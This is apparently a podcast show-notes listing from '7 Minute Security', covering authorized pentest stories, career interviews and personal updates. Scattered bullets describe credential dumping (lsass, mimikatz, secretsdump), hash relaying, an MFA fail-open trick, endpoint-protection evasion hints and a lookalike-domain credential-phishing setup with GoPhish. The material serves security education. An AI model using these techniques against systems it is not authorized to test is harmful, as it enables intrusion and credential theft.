• Apple Screen Time is your friend, and helps put some limits on iDevice use
• The Dream Machine makes it easy to setup a segmented wireless network just for your kids. You can also "time box" their individual network to only broadcast at certain hours of the day
• You can then apply OpenDNS to filter bad sites on just the kiddo network or ALL your networks
• If you make a home backup/DR plan make sure it includes important stuff like: passwords to important things, as well as critical contacts like your tax prep person, financial advisor and subcontractors.
• When doing school-from-home when one kid isn't in the house, we've found it helpful to setup a shared Google doc that contains high priority projects and a calendar with expectations for the week. We will also be doing a daily FaceTime check-in to make sure everything is going well.
• This virus is a "big fat buttweek" - according to my 9-year-old

View this episode's show notes for more information

Published: Thursday, March 26, 2020

In today's episode I share four fun stay-at-home security projects - three with a security focus and one centered around music. Let's gooooooooo!FoldingAtHomeThe Folding At Home project helps use...

• Edit > EOL Conversion > Unix (LF)

View this episode's show notes for more information

Published: Saturday, March 21, 2020

This episode of the 7MS podcast is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the later, and ITProTV has you covered. From CompTIA and Cisco to ECCouncil and VMWare. Get a 7-day free trial and save 30% off all plans by going to...

• Priced at ~$500
• One on-prem array
• Encrypted at rest
• Backs up to cloud with encryption key I control
• Unlimited scalable storage
• Synology DS218+
• 2 Seagate Ironwolf 4TB drives
• 4GB of RAM for the NAS
• CrashPlan subscription
• CrashPlan docker container

View this episode's show notes for more information

Published: Friday, March 13, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode of...

• MFA on internal servers (which we bypassed )
• Strong passwords
• Limited vulnerable protocols (LLMNR/Netbios/etc) available to abuse for cred-capturing
• Servers that were heavily firewalled off from talking SMB to just any ol' subnet nor the Interwebs (here's a great video on how to fine-tune your software firewall chops)
• How maybe it's not a good idea to make computer go completely "shields down" during pentests
• Being careful not to fat-finger anything when you spawn cmd.exe with creds, like
• Being careful not to fat-finger anything when using CrackMapExec
• How fundamental and really effective blue team controls (such as the ones mentioned above) can really make pentesting a headache!
• How you should be careful when spawning shells with MultiRelay (part of Responder is it creates new services on your victim machine

View this episode's show notes for more information

Published: Monday, March 09, 2020

Today's slightly off-topic episode kicks off a new tag called 7MOOMAMA. That stands for 7 Minutes of Only Music and Miscellaneous Awesomeness.To kick things off, I'm super excited to share with you two new security-themed songs for some of my favorite security things! They are:Enjoy!Backdoors and...

• Backdoors and Breaches - my favorite incident response card game!
• OWASP Juice Shop - my favorite vulnerable Web application!

View this episode's show notes for more information

Published: Wednesday, February 26, 2020

Today I'm joined by Matt Duench ( LinkedIn / Twitter ), who has a broad background in technology and security - from traveling to over 40 countries around the world working with telecom services, to his current role...

• Corporate conversations around security have changed drastically in such a short time - specifically, security is generally no longer perceived as a cost center. So why are so many organizations basically still in security diapers as far as their maturity?
• Why is it still so hard to find “bad stuff” on the network?
• What are some common security mistakes you wish you could wave a magic wand and fix for all companies?
• The beauty of the CIS Top 20 and how following even the top 5 controls can stop 85% of attacks.
• Low-hanging hacker fruit that all organizations should consider addressing, such as:Disabling IPv6Using a password managerTurning on multi-factor authenticationDon’t write down your passwords!Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to peopleConsider an additional rule to stop display name spoofing (h/t to Rob on Slack !)
• Disabling IPv6
• Using a password manager
• Turning on multi-factor authentication
• Don’t write down your passwords!
• Have a mail transport rule that marks external mail as “EXTERNAL” so it jumps out to people
• Consider an additional rule to stop display name spoofing (h/t to Rob on Slack !)
• Why you should be concerned about corporate account takeover, and how to better protect yourself and your company against this attack vector
• Do you (Arctic Wolf) have an option to integrate with various firewall/IPS vendors to automatically block confirmed attacks?
• Can you detect IT-only or also OT/ICS attacks?
• How quickly can you detect newly released vulnerabilities in IT systems?
• Can you detect if someone has breached a particular website/service?
• Can you detect if a user opened a phishing mail?
• Is the Arctic Wolf manned 24/7/365?
• How is the set up done for Arctic Wolf? Do you have a machine in the client’s network, and those machines send data to a central location?
• Does Arctic Wolf use endpoint detection or do they have network devices deployed as well (perhaps to pick things up on devices that can't run their agent)?

View this episode's show notes for more information

Published: Friday, February 21, 2020

It’s episode 401 and we’re having fun, right? Some things we cover today:Besides that, I’ve got a wonderful tale of pentest pwnage for you. Warning: this is a TBC (to be continued) episode in that I don’t even know how it will shake out. I’m honestly not sure if we’ll get DA! Here are the...

• The Webinar version of the DIY Pwnagotchi evening will be offered in Webinar format on Tuesday, March 10 at 10 a.m.
• A quick house fire update - we’re closer to demolition now!
• I finally got a new guitar !
• I think in the past I might've said unauthenticated Nessus scans weren't worth much, but this test changed my mind.
• If you can't dump local hashes with CrackMapExec, try SecretsDump!
• If you're relaying net user commands (or just typing them from a relayed shell), this one-liner is a good way to quickly add your user to local admins and the Remote Desktop Users group:
• Trying to RDP into a box protected with Duo MFA? If you can edit the c:\windows\system32\drivers\etc\hosts file, you might be able change the Duo authentication server from api-xxxxxxx.duosecurity.com to 127.0.0.1 and force authenetication to fail open! Source: Pentest Partners
• In general, keep an eye on CrackMapExec's output whenever you use the '-x' flag to run commands. If the system is "hanging" on a command for a while and then gives you NO output and just drops you back at your Kali prompt, the command might not be running at all due to something else on the system blocking your efforts.
• To check if the wdigest flag is properly set on a machine, run:

View this episode's show notes for more information

Published: Friday, February 14, 2020

Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast!Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include:Has 7MS helped you in your IT and security career?...

• Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?).
• If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ!
• If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf ) for the tip!
• If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag.
• If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly.

View this episode's show notes for more information

Published: Friday, February 07, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Believe it or not...

• Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive
• Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 - Intel 300 Series chipset
• ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard
• EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply
• Corsair Graphite 760T ATX Full-Tower Computer Case
• G.Skill Ripjaws V 16GB 2 x 8GB DDR4-3200 PC4-25600 CL16 Dual Channel Desktop Memory Kit F4-3200C16D-16GVKB
• EVGA GeForce RTX NVLINK SLI Bridge - 4 Slot Spacing
• Cooler Master Hyper 212 Black Universal CPU Cooler
• 2x - EVGA GeForce RTX 2080 Ti FTW3 Ultra Gaming Triple-Fan 11GB GDDR6 PCIe 3.0 Video Card
• Download the Ubuntu mini.iso

View this episode's show notes for more information

Published: Thursday, January 30, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'll be your...

View this episode's show notes for more information

Published: Thursday, January 23, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'm working on a new...

View this episode's show notes for more information

Published: Wednesday, January 15, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In [last week's...

• How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative . That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John
• If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump , test egress filtering , run Network Detective and more
• Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this:
• The procdump + lsass trick is still really effective (though sometimes AV gobbles it)
• Wanna see if a user has a specific Chrome extension installed? Check this article and then use CrackMapExec with -x dir c:\x\y\z to verify its existence!
• I jacked up my ankle and suffered an avulsion fracture . It's good times.
• Cyber Mentor
• hausec
• Josh T
• Dirk-jan Mollema
• Cyberfreaq who helped me resolve a key issue with mitm6
• Dominic from Slack
• Gh0sthax from Slack
• Nate from Slack

View this episode's show notes for more information

Published: Thursday, January 09, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's tale of...

• It's great to have additional goals to achieve in a network pentest outside of just "get DA"
• PayloadsAllTheThings has a great section on Active Directory attacks
• Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!
• If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:
• When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!
• Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!
• Cyber Mentor
• hausec
• Josh T
• Dirk-jan Mollema
• Cyberfreaq who helped me resolve a key issue with mitm6
• Dominic from Slack
• Gh0sthax from Slack
• Nate from Slack

View this episode's show notes for more information

Published: Friday, January 03, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Sung to the tune of...

View this episode's show notes for more information

Published: Thursday, December 26, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Peter Kim of [The Hacker...

• The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
• How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
• How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
• What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
• What are some other low-hanging fruit organizations can use to better defend their networks?
• Do you run across some of these good defenses - like honeypots - in your engagements?
• If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?
• Stuck on a pentest? Try explaining the situation to a non-technical person!
• What irks you during a pentest?
• Have you run into any cyber deception on a pentest, or other things that make you go "Curse you blue team!!!"?
• Have you ever stumbled upon a legitimate compromise or breach during testing?
• Do you do your own "house clean up" when done with an engagement (killing shells, removing .scf files, payloads, artifacts, etc.) or do you leave that responsibility up to the client?
• What would you do if you weren't doing security?
• What movie or movie character resembles your life?
• If you had to wear one shirt for the rest of your life, what would it be/say and why?
• Would you rather have a belly button that could dispense ketchup, or fingers that could dispense hot dogs?
• You've got Bruce Willis, Mike Pence and Pink in a room. You need to hug one, do a 17-hour non-stop road trip with one, and be a year-long security consultant to the third. Who do you pick, and why?
• Secure Planet training
• The Hacker Playbook series

View this episode's show notes for more information

Published: Friday, December 20, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• It's awesome
• It's free
• People still haven't heard of it when I share info about it during conference talks!
• I've got a full write-up of how to install LAPS here
• At a recent conference people asked me two awesome edge case questions:
• What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?
• What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

View this episode's show notes for more information

Published: Thursday, December 12, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)
• How long to you get to keep rental cars before you have to replace your permanent vehicles?
• Do you have to stay in a hotel the whole time your house is rebuilt?
• What about when you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?
• What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

View this episode's show notes for more information

Published: Friday, December 06, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
• A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
• This handy script runs nmap against subnets, then Eyewitness , then emails the results to you
• Early in the engagement I'd highly recommend checking for Kerberoastable accounts
• I really like Multirelay to help me pass hashes, like:
• Once you get a shell, run dump to dump hashes!
• Then, use CME to pass that hash around the network!
• Then, check out this article to use NPS and get a full-featured shell on your targets

View this episode's show notes for more information

Published: Thursday, November 21, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In [part...

• How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
• New licenses
• New ATM/credit cards
• Rental vehicles
• Temporary housing
• How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect
• What's it like working with the insurance machine? What do they help with and not help with?
• How much does it suck to lose all your stuff? (Spoiler alert: a lot)
• The relief (as weird as that sounds) that comes with losing all your material things

View this episode's show notes for more information

Published: Friday, November 15, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• Today: Talk about "day zero" - everything that happened on the day of the fire
• Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
• Part 3: talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

View this episode's show notes for more information

Published: Monday, November 11, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Docusign is out and (sort of) replaced with Proposify
• Voltage SecureMail is out and replaced by ShareFile
• Ninite is rad for keeping mobile pentest dropboxes automatically updated!
• Nessys_SortyMcSortleton has been updated to...you know...work
• How do you (comfortably) talk about money with a client before the SOW hits their inbox?
• If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

View this episode's show notes for more information

Published: Friday, November 01, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!I'm sorry it took me forever and a day...

• Running into angry system admins (that are either too fired up or not fired up enough)
• Being wrong without being ashamed
• When is it necessary to make too much noice to get caught during an engagement?
• What are the top 5 tools you run on every engagement?
• How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
• How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
• How do you deal with colleagues who take findings as their own when they talk with management?
• How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
• What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
• How could a fresh grad get into a red team job?
• What do recruiters look for candidates seeking red team positions?
• If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
• What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
• What's your favorite red team horror story?

View this episode's show notes for more information

Published: Friday, November 01, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
• Offensive Security Wireless Professional
• Pentester Academy
• VulnHub
• Rastalabs
• The Cyber Mentor
• WEFFLES
• Logging Made Easy
• HELK
• Wazuh

View this episode's show notes for more information

Published: Saturday, October 12, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Consider this list of top 9 phishing simulators.
• Check out GoPhish !
• Then spin up a free tier Kali AWS box
• Follow the instructions to install GoPhish and get it running on your AWS box
• Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
• Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
• Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this:
• Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
• Have fun!!!

View this episode's show notes for more information

Published: Tuesday, October 01, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!This episode is a "sequel" of sorts to...

• Relayed one high-priv cred from one box to another
• Dumped and cracked a local machine's hash
• Passed that hash around the network
• Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
• Set the wdigest flag via CrackMapExec

View this episode's show notes for more information

Published: Tuesday, September 24, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Strong user passwords
• A SIEM solution that appeared to be doing a great job
• Systems missing EternalBlue patch
• Systems missing BlueKeep patch

View this episode's show notes for more information

Published: Wednesday, September 18, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
• Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source ):
• To turn on remote desktop:
• To set the firewall to allow RDP:
• To stop the freakin' Windows hosts from going to sleep:
• To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:
• To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"
• Get SSH keys regenerated and install/run openssh server:
• Then grab some essential pentesting tools using Kali essentials , and keep them updated with git update

View this episode's show notes for more information

Published: Thursday, September 05, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
• Sucked our nmap scans into Eyewitness
• Captured and cracked some creds with Paperspace
• Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)
• Checking the environment for CVE-2019-1040
• Picking apart the privileges on my "pseudo domain admin" account
• Making a startling discovery about how almost all corp passwords were stored

View this episode's show notes for more information

Published: Friday, August 30, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!This episode, besides talking about a...

• Review of setting up your DIY pentest dropbox
• Choosing the right hardware (I'm partial to this NUC )
• Running Responder to catch creds
• Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
• Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
• Running Sharphound to get a map of the AD environment
• Cracking creds with Paperspace
• When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

View this episode's show notes for more information

Published: Thursday, August 22, 2019

In today's episode, I sit down with Zane West of Proficio . Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect...

• How important is it to have an IT background before you jump into security?
• How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
• Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
• Why in the world does it take twenty seven people to run a SOC?!
• When should an organization consider engaging an MSSP to help them with their security needs?
• What if your MSP also provides MSSP services? Is that a good or bad thing?
• What are some tips for successfully deploying a SIEM?
• What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

View this episode's show notes for more information

Published: Friday, August 16, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• Turn the firewall offSet Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.
• Disable Windows DefenderNavigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.
• Disable power sleep settingsTo stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled
• Create a second disk on the Windows management VM and install BitLocker to Go
• Snooze windows updates (for a reasonable amount of time) during a pentest so the box doesn't auto-reboot
• Set a static DNS entry of something popular/public like 1.1.1.1 or 4.2.2.2 or 8.8.8.8 to ensure your dropbox can reach the Internet once connected.

View this episode's show notes for more information

Published: Monday, August 12, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by...

• I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.
• I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers .
• I had a really fun pentest recently where I found some good old school SQL injection . I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help:Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilitiesInstall CO2 from the BApp storeWhen doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings Grab a copy of sqlmap Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:
• Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
• Install CO2 from the BApp store
• When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
• Grab a copy of sqlmap
• Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:
• Also, practice your SQL injection (and other skills) on the OWASP Juice Shop !

View this episode's show notes for more information

Published: Saturday, August 03, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!I swear this program isn't turning into the Dr....

• Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time.
• If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears
• Checking for DNS zone transfers is a good idea!

View this episode's show notes for more information

Published: Wednesday, July 24, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Ok, I lied a few episodes ago, and I'm sorry! I...

View this episode's show notes for more information

Published: Friday, July 19, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's episode is a two-tale story of me...

View this episode's show notes for more information

Published: Monday, July 15, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
• Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
• Want to be more sniper-focused in your hash-passing? Try the MultiRelay tool as part of the Responder kit. You can choose just a target IP and just specific usernames in hashes to pass. This site has some great examples, but here's an example with one target IP and just the domain administrator accounts from AD:
• Ryan Haus for his awesome series on penetration testing Active Directory as well as...
• Vincent Yiu for pointing me to this article which gave me the path to domain admin. I'll let you soak in that article as there's a lot of meat in it, but here's the attack path I followed:

View this episode's show notes for more information

Published: Friday, July 12, 2019

Today's episode is brought to you by ITProTV . It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting...

• Having separate accounts for day-to-day operations and administrative/privileged tasks
• Local Administrator account largely disabled across the enterprise
• Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
• Hard-to-crack passwords!

View this episode's show notes for more information

Published: Wednesday, July 03, 2019

Hey folks, happy secure 4th o' July!In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include:.

• NPK , which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress!
• Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up.
• Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song . If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.

View this episode's show notes for more information

Published: Friday, June 28, 2019

Today's episode is brought to you by my friends at safepass.me . Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is...

• People are telling me they're having problems installing the drivers
• My methodology for building wordlists with HateCrack doesn't seem to work anymore
• I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything.

View this episode's show notes for more information

Published: Monday, June 24, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .In today's...

• Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote.
• Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency.
• Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.

View this episode's show notes for more information

Published: Monday, June 17, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Hey! I'm on the road again - this time with a tale encompassing:How to conduct a mini risk assessment in just two hours. Some ways to consider...

• A discussion of administrative and physical controls
• Create a network inventory using nmap and Eyewitness
• Conduct an external vulnerability scan with Nessus or OpenVAS

View this episode's show notes for more information

Published: Monday, June 17, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major...

View this episode's show notes for more information

Published: Thursday, May 30, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .First, a bit...

• If you replace "red rain" with "red team" in this song , we might just have a red team anthem on our hands!
• If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB . If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!
• Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective! Try and figure out:
• Who are the important people and what do they do?
• What does the company's Internet footprint look like?
• What's the internal network look like - any idea of the browsers in play (think malware!)?
• Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?
• Any tips for the most dreaded part of an assessment (reports)?
• How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?
• What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)
• What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!"). Some options:
• Red Team Security offers social engineering and Red Team Training
• Mandiant has Creative Red Team Training
• Specter Ops has several training options
• SANS offers SEC564: Red Team Operations and Threat Emulation
• Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?

View this episode's show notes for more information

Published: Thursday, May 23, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8 .This episode...

